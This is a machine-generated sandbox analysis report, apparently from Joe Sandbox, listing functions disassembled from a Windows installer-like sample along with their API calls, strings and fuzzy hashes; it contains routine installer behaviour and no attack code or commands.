                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocHandleWire
                                                                                      • String ID:
                                                                                      • API String ID: 2210401237-0
                                                                                      • Opcode ID: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                                      • Instruction ID: ad050c8fb554795a0ca7e59246f03ac17dd57b6c6051e6027a9978793207e39e
                                                                                      • Opcode Fuzzy Hash: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                                      • Instruction Fuzzy Hash: A0B009C5814A05B9EC0833B24C0BD3F141CD88072C3808A6FB458BA1839C7C9C402A3D
                                                                                      Function 0045A940 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 166COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00450088: SetEndOfFile.KERNEL32(?,?,0045AA1E,00000000,0045ABA9,?,00000000,00000002,00000002), ref: 0045008F
                                                                                      • FlushFileBuffers.KERNEL32(?), ref: 0045AB75
                                                                                      Strings
                                                                                      • NumRecs range exceeded, xrefs: 0045AA72
                                                                                      • EndOffset range exceeded, xrefs: 0045AAA9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$BuffersFlush
                                                                                      • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                                      • API String ID: 3593489403-659731555
                                                                                      • Opcode ID: 284914d50a052015b7c75a6107dacc898a09a70c67966605e73dc69b2178a5f5
                                                                                      • Instruction ID: 49fd1ead36e8c92626c0d22f3e04e342ae71ee3369d077df08b87a69a2b16800
                                                                                      • Opcode Fuzzy Hash: 284914d50a052015b7c75a6107dacc898a09a70c67966605e73dc69b2178a5f5
                                                                                      • Instruction Fuzzy Hash: 68617334A002588FDB24DF25C881BDAB7B5EF49305F0085EAED889B352D674AEC9CF55
                                                                                      Function 004931D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,004931DE), ref: 0040334B
                                                                                        • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,004931DE), ref: 00403356
                                                                                        • Part of subcall function 00409AE8: 6F571CD0.COMCTL32(004931ED), ref: 00409AE8
                                                                                        • Part of subcall function 004108C4: GetCurrentThreadId.KERNEL32 ref: 00410912
                                                                                        • Part of subcall function 00418FB0: GetVersion.KERNEL32(00493201), ref: 00418FB0
                                                                                        • Part of subcall function 0044F178: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00493215), ref: 0044F1B3
                                                                                        • Part of subcall function 0044F178: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F1B9
                                                                                        • Part of subcall function 0044F55C: GetVersionExA.KERNEL32(00496780,0049321A), ref: 0044F56B
                                                                                        • Part of subcall function 00451DF8: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451E91,?,?,?,?,00000000,?,00493224), ref: 00451E18
                                                                                        • Part of subcall function 00451DF8: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00451E1E
                                                                                        • Part of subcall function 00451DF8: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451E91,?,?,?,?,00000000,?,00493224), ref: 00451E32
                                                                                        • Part of subcall function 00451DF8: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00451E38
                                                                                        • Part of subcall function 00460EAC: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00493238), ref: 00460EBB
                                                                                        • Part of subcall function 00460EAC: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00460EC1
                                                                                        • Part of subcall function 00468C50: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 00468C65
                                                                                        • Part of subcall function 00474088: GetModuleHandleA.KERNEL32(kernel32.dll,?,00493242), ref: 0047408E
                                                                                        • Part of subcall function 00474088: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 0047409B
                                                                                        • Part of subcall function 00474088: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004740AB
                                                                                        • Part of subcall function 00490338: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 00490351
                                                                                      • SetErrorMode.KERNEL32(00000001,00000000,0049328A), ref: 0049325C
                                                                                        • Part of subcall function 00492FE0: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00493266,00000001,00000000,0049328A), ref: 00492FEA
                                                                                        • Part of subcall function 00492FE0: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00492FF0
                                                                                        • Part of subcall function 00424444: SendMessageA.USER32(?,0000B020,00000000,?), ref: 00424463
                                                                                        • Part of subcall function 00424234: SetWindowTextA.USER32(?,00000000), ref: 0042424C
                                                                                      • ShowWindow.USER32(?,00000005,00000000,0049328A), ref: 004932CD
                                                                                        • Part of subcall function 0047D0AC: SetActiveWindow.USER32(?), ref: 0047D150
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorF571FormatLibraryLineLoadMessageModeRegisterSendShowTextThread
                                                                                      • String ID: Setup
                                                                                      • API String ID: 4109318208-3839654196
                                                                                      • Opcode ID: fee832f36ce975679e260f9b0954113cf3741595f260ce40ded7ca7ebb5c54dd
                                                                                      • Instruction ID: 779a321fc15f42447a8f0963ad68d9f2a93317841f7d3acf2e890d1de8ee30c9
                                                                                      • Opcode Fuzzy Hash: fee832f36ce975679e260f9b0954113cf3741595f260ce40ded7ca7ebb5c54dd
                                                                                      • Instruction Fuzzy Hash: 0531A3312146409FDB11BBB7AC1351D3BA4EB8A71DBA2447FF804C2653CE3D5C548A6E
                                                                                      Function 004513F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60processCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateProcessA.KERNEL32(00000000,00000000,?,?,dE,00000000,004564D0,?,?,?,00000000,0045146A,?,?,?,00000001), ref: 00451444
                                                                                      • GetLastError.KERNEL32(00000000,00000000,?,?,dE,00000000,004564D0,?,?,?,00000000,0045146A,?,?,?,00000001), ref: 0045144C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateErrorLastProcess
                                                                                      • String ID: dE
                                                                                      • API String ID: 2919029540-3809906464
                                                                                      • Opcode ID: 593608dd5432025e5c10579cc54da45850a235723a39842afc18d8064d6d1a21
                                                                                      • Instruction ID: 6a74b67a3bdf66ca54efcfc0657381ecd904da166113fafb2436bbcb0ae12e28
                                                                                      • Opcode Fuzzy Hash: 593608dd5432025e5c10579cc54da45850a235723a39842afc18d8064d6d1a21
                                                                                      • Instruction Fuzzy Hash: E1117972600208AF8B00DEA9DC41EDFB7ECEB4D310B114566FD18D3212D638AD15CBA4
                                                                                      Function 004776B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,00477936,00000000,0047794C,?,?,?,?,00000000), ref: 00477712
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Close
                                                                                      • String ID: RegisteredOrganization$RegisteredOwner
                                                                                      • API String ID: 3535843008-1113070880
                                                                                      • Opcode ID: 5da0313d24de2a72906f0e02df73607d497778b3bd604c1f31dadd7d7b78e1f2
                                                                                      • Instruction ID: 44da9ba76ca96eafcd406259b3cb4b8fe95da4c4325a64976e48815ca65e7baf
                                                                                      • Opcode Fuzzy Hash: 5da0313d24de2a72906f0e02df73607d497778b3bd604c1f31dadd7d7b78e1f2
                                                                                      • Instruction Fuzzy Hash: 94F0593470C244AFDB04D6A5EC52BAB3B9AD740308FA4807BA544CB391C67CBD05D74C
                                                                                      Function 004231AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 004231B9
                                                                                      • LoadCursorA.USER32(00000000,00000000), ref: 004231E3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CursorLoad
                                                                                      • String ID: EI
                                                                                      • API String ID: 3238433803-1715459816
                                                                                      • Opcode ID: cf7d116e50ce189f5790faa080c989bb411d79830bfeb1cde74da96b9f6355ff
                                                                                      • Instruction ID: e763212e35d88e91f52bf3e5ce882ef76e84b1945e438db40d164ba05c470673
                                                                                      • Opcode Fuzzy Hash: cf7d116e50ce189f5790faa080c989bb411d79830bfeb1cde74da96b9f6355ff
                                                                                      • Instruction Fuzzy Hash: 1DF0A7117001145BD620593E6CC1D3A72688F87736B61033BFE2AD72D1C62E2D51426D
                                                                                      Function 00470F48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,0047117F), ref: 00470F6D
                                                                                      • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,0047117F), ref: 00470F84
                                                                                        • Part of subcall function 004520A4: GetLastError.KERNEL32(00000000,00452B15,00000005,00000000,00452B4A,?,?,00000000,00496628,00000004,00000000,00000000,00000000,?,00492A61,00000000), ref: 004520A7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateErrorFileHandleLast
                                                                                      • String ID: CreateFile
                                                                                      • API String ID: 2528220319-823142352
                                                                                      • Opcode ID: 8e17254768e76acdbc2e0aeec1a0314679b2821655cd6b60debc059c7f00f31f
                                                                                      • Instruction ID: 4dce3a0fb710f8058c99a71000b1262451dde5c1e1bb000cefd451e94b844243
                                                                                      • Opcode Fuzzy Hash: 8e17254768e76acdbc2e0aeec1a0314679b2821655cd6b60debc059c7f00f31f
                                                                                      • Instruction Fuzzy Hash: C4E06D74341304BFEA20E669DCC6F4977889B04728F108152FA48AF3E2C6F9EC408658
                                                                                      Function 0046ADDC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,TqI,00000004,00000001,?,0046B40F,?,?,00000000,0046B4F7,?,_is1,?), ref: 0046ADEF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Value
                                                                                      • String ID: NoModify$TqI
                                                                                      • API String ID: 3702945584-2484388882
                                                                                      • Opcode ID: f5a2910f86b5d4890aa6fcbcf0034d47aef96215c39c1bb137200c97013dc63d
                                                                                      • Instruction ID: 388a847686ab158aae351853834ee3a19678c554c0d9cb8fd514d48c61279f2c
                                                                                      • Opcode Fuzzy Hash: f5a2910f86b5d4890aa6fcbcf0034d47aef96215c39c1bb137200c97013dc63d
                                                                                      • Instruction Fuzzy Hash: F4E04FB0640704BFEB04DB55CD4AF6B77ACDB48714F104059BA08EB281E674FE10CA69
                                                                                      Function 0042DC54 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,OG,?,00000001,?,?,0047E34F,?,00000001,00000000), ref: 0042DC70
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Open
                                                                                      • String ID: OG$System\CurrentControlSet\Control\Windows
                                                                                      • API String ID: 71445658-2870956291
                                                                                      • Opcode ID: cac79e148e5d1637301d0cd401e0a8768c8b40d51dfb76d9d00be79e5a4099f3
                                                                                      • Instruction ID: fabb803f5ff523eeab3b7a035bb747b9213277980d9d81731b2bf545c5070290
                                                                                      • Opcode Fuzzy Hash: cac79e148e5d1637301d0cd401e0a8768c8b40d51dfb76d9d00be79e5a4099f3
                                                                                      • Instruction Fuzzy Hash: EDD0C772910128BBDB10DA89DC41DF7775DDB59760F54401AFD0497141C1B4EC5197F4
                                                                                      Function 00468C50 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0042E1F0: SetErrorMode.KERNEL32(00008000), ref: 0042E1FA
                                                                                        • Part of subcall function 0042E1F0: LoadLibraryA.KERNEL32(00000000,00000000,0042E244,?,00000000,0042E262,?,00008000), ref: 0042E229
                                                                                      • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 00468C65
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressErrorLibraryLoadModeProc
                                                                                      • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                      • API String ID: 2492108670-2683653824
                                                                                      • Opcode ID: 2242cd585e3a95cf47e04d02ab2c9cb54a1972a887a648b3717fd23610ab8d3e
                                                                                      • Instruction ID: f54d236eaa647a004fc156d77ac0774b12b8f86e94465ae50302f3b70839ea38
                                                                                      • Opcode Fuzzy Hash: 2242cd585e3a95cf47e04d02ab2c9cb54a1972a887a648b3717fd23610ab8d3e
                                                                                      • Instruction Fuzzy Hash: FDB092A064271082CE006BB2584271B22149750744B10C57FB040AA295EE7D88044FBE
                                                                                      Function 0047C760 Relevance: 4.6, APIs: 3, Instructions: 98windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetSystemMenu.USER32(00000000,00000000,00000000,0047C898), ref: 0047C830
                                                                                      • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0047C841
                                                                                      • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 0047C859
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$Append$System
                                                                                      • String ID:
                                                                                      • API String ID: 1489644407-0
                                                                                      • Opcode ID: 103ad35a9952b07d56bdb3bad9c34a645578be9cba599f62803875c0b4fd2168
                                                                                      • Instruction ID: 938ecdfec97688d9e91313a56ab48558b9b04f1f4dc78c4c1ee95835cae09dfe
                                                                                      • Opcode Fuzzy Hash: 103ad35a9952b07d56bdb3bad9c34a645578be9cba599f62803875c0b4fd2168
                                                                                      • Instruction Fuzzy Hash: BA31CF307143455AD710FB768CC2B9A3A989B51318F55947FF904AA2D3CA7C9C09C66E
                                                                                      Function 0044ADC0 Relevance: 4.6, APIs: 3, Instructions: 74COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • 73A0A570.USER32(00000000,?,00000000,00000000,0044AEC1,?,0047D0C7,?,?), ref: 0044AE35
                                                                                      • SelectObject.GDI32(?,00000000), ref: 0044AE58
                                                                                      • 73A0A480.USER32(00000000,?,0044AE98,00000000,0044AE91,?,00000000,?,00000000,00000000,0044AEC1,?,0047D0C7,?,?), ref: 0044AE8B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: A480A570ObjectSelect
                                                                                      • String ID:
                                                                                      • API String ID: 1230475511-0
                                                                                      • Opcode ID: 91444e5bf131007ac93604d47e6fc7e18e34c23fefa9c833d2c38518ec62aedf
                                                                                      • Instruction ID: 233d7bfbdcc25e67ff0a572e229f91d747dfb26028a93c536af8bc2826ebb7c8
                                                                                      • Opcode Fuzzy Hash: 91444e5bf131007ac93604d47e6fc7e18e34c23fefa9c833d2c38518ec62aedf
                                                                                      • Instruction Fuzzy Hash: D721B570E84208AFEB01DFA5C841B9F7BB9DB48304F51847AF504A6281C77C9950CB19
                                                                                      Function 0044AAF4 Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044AB80,?,0047D0C7,?,?), ref: 0044AB52
                                                                                      • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044AB65
                                                                                      • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044AB99
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: DrawText$ByteCharMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 65125430-0
                                                                                      • Opcode ID: 145cb60817e1461b02aba970f6a399deb92e78d362c3eca44f3c4fb02434d21d
                                                                                      • Instruction ID: de988064b5c118741e346c03ff1e8b17db840b4da88b1af59de34c2d8924ec6d
                                                                                      • Opcode Fuzzy Hash: 145cb60817e1461b02aba970f6a399deb92e78d362c3eca44f3c4fb02434d21d
                                                                                      • Instruction Fuzzy Hash: D811E6B27446447FE711DAAA8C81D6FB7EDDB88724F10413AF604E7280C6389E018669
                                                                                      Function 0042436C Relevance: 4.6, APIs: 3, Instructions: 59windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424382
                                                                                      • TranslateMessage.USER32(?), ref: 004243FF
                                                                                      • DispatchMessageA.USER32(?), ref: 00424409
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$DispatchPeekTranslate
                                                                                      • String ID:
                                                                                      • API String ID: 4217535847-0
                                                                                      • Opcode ID: 4c72fe453077d3d5441811771d3c73f57da1beb0f02e586e781598996b195a0c
                                                                                      • Instruction ID: aef1b0206ccdbb2aa8587e86ea6dacd49c82d9c27d6d10fa8c02d352bba97142
                                                                                      • Opcode Fuzzy Hash: 4c72fe453077d3d5441811771d3c73f57da1beb0f02e586e781598996b195a0c
                                                                                      • Instruction Fuzzy Hash: 6F11543030432056DA20E665A94179B73D4DFC1B44F80886EF9DD97382D77D9D4987AA
                                                                                      Function 004165B4 Relevance: 4.5, APIs: 3, Instructions: 39COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetPropA.USER32(00000000,00000000), ref: 004165DA
                                                                                      • SetPropA.USER32(00000000,00000000), ref: 004165EF
                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 00416616
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Prop$Window
                                                                                      • String ID:
                                                                                      • API String ID: 3363284559-0
                                                                                      • Opcode ID: 1283a2ba918a1a05b7609b6f7b848b7b983b1697ade3d6b61c1960e914505d94
                                                                                      • Instruction ID: 49560f5f00ee2c9135054c0b38937f4b9f373f0e35015079742173c5fde362c9
                                                                                      • Opcode Fuzzy Hash: 1283a2ba918a1a05b7609b6f7b848b7b983b1697ade3d6b61c1960e914505d94
                                                                                      • Instruction Fuzzy Hash: C3F0BD71701220BBEB10AB599C85FA632DCAB09715F16057ABE09EF286C778DC44C7A8
                                                                                      Function 004014E4 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 37memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
